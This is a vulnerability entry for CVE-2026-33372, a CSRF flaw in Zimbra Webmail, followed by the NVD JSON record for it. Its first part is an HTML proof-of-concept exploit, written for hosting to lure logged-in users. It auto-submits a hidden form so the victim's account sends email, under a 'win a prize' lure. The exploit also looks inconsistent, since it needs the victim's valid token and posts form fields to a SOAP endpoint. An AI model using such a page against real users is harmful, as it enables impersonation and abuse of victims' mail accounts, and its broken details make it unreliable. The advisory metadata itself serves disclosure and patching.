CVE-2026-33372

<!-- PoC for CVE-2026-33372: Zimbra Collaboration CSRF Description: Exploits the vulnerability where the CSRF token is accepted in the request body. Usage: Host this file on a server and trick an authenticated Zimbra user to visit it. --> <html> <body> <h2>Zimbra CSRF Exploit</h2> <form action="https://target-zimbra-domain.com/service/soap/SendMsgRequest" method="POST"> <!-- The vulnerable application accepts the token in the body --> <input type="hidden" name="csrf_token" value="VALID_TOKEN_FROM_USER_SESSION" /> <input type="hidden" name="action" value="send_email" /> <input type="hidden" name="to" value="[email protected]" /> <input type="hidden" name="subject" value="CSRF Test" /> <input type="hidden" name="content" value="This email was sent via CSRF." /> <input type="submit" value="Click me to win a prize!" /> </form> <script> // Auto-submit the form on load document.forms[0].submit(); </script> </body> </html>

{"cve": {"id": "CVE-2026-33372", "sourceIdentifier": "[email protected]", "published": "2026-03-20T14:16:16.357", "lastModified": "2026-04-01T15:32:50.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Zimbra Collaboration (ZCS) 10.0 and 10.1. A cross-site request forgery (CSRF) vulnerability exists in Zimbra Webmail due to improper validation of CSRF tokens. The application accepts CSRF tokens supplied within the request body instead of requiring them through the expected request header. An attacker can exploit this issue by tricking an authenticated user into submitting a crafted request. This may allow unauthorized actions to be performed on behalf of the victim."}, {"lang": "es", "value": "Se descubrió un problema en Zimbra Collaboration (ZCS) 10.0 y 10.1. Existe una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Zimbra Webmail debido a una validación incorrecta de los tokens CSRF. La aplicación acepta tokens CSRF suministrados dentro del cuerpo de la petición en lugar de requerirlos a través de la cabecera de petición esperada. Un atacante puede explotar este problema engañando a un usuario autenticado para que envíe una petición manipulada. Esto puede permitir que se realicen acciones no autorizadas en nombre de la víctima."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.1.16", "matchCriteriaId": "E8DBE536-EAB0-48FF-A195-C0DB0A7FBCA0"}]}]}], "references": [{"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.16#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}